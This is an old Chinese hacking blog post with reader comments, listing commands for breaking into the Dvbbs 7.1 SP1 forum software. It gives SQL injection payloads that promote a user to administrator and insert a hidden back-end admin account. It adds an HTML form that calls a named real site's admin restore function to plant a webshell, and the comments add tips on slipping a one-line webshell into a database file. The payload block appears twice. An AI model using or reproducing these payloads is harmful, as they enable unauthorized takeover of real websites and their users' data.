2006-05-15 11:23:05 by: h4x0r
入侵动网7.1 SP1 用到的命令
增加前台管理员用户名:
coolidea|||123',0);update/**/Dv_User/**/set/**/UsergroupID='1'/**/where[UserName]='h4x0r';--
加后台管理员用户:
coolidea|||123',0);Insert/**/into/**/Dv_admin(Password,Username,Adduser,Flag)/**/values('e10adc3949ba59abbe56e057f20f883e ','h4x0r','h4x0r','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,');--
拿webshell
<form action="http://www.zhsc.net/bbs/admin/data.asp?action=RestoreData&act=Restore" method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>
不必要在注入拿SHELL了,很方便
只针对SQL版有效~
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=715
coolidea|||123',0);update/**/Dv_User/**/set/**/UsergroupID='1'/**/where[UserName]='h4x0r';--
加后台管理员用户:
coolidea|||123',0);Insert/**/into/**/Dv_admin(Password,Username,Adduser,Flag)/**/values('e10adc3949ba59abbe56e057f20f883e ','h4x0r','h4x0r','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,');--
拿webshell
<form action="http://www.zhsc.net/bbs/admin/data.asp?action=RestoreData&act=Restore" method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>
不必要在注入拿SHELL了,很方便
只针对SQL版有效~
[Last Modified By h4x0r, at 2006-05-29 01:23:26]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=715
View Mode: |
Comments: 4
| Views: 1073
樱木花盗
[ 2006-05-16 01:22:41 ]
SQL版的吧?AC这个行不?
nyhyeah
[ 2006-05-20 11:30:26 ]
弄webshell有问题de 文件上传有限制
YYB
[ 2006-05-20 12:34:55 ]
呵。在后台上传类型中加个MDB的...把一句话插入MDB...上传.差异备份.就OK了..
xiaoyu
[ 2006-06-17 21:05:36 ]
寒,也不说哪个页面有注入点
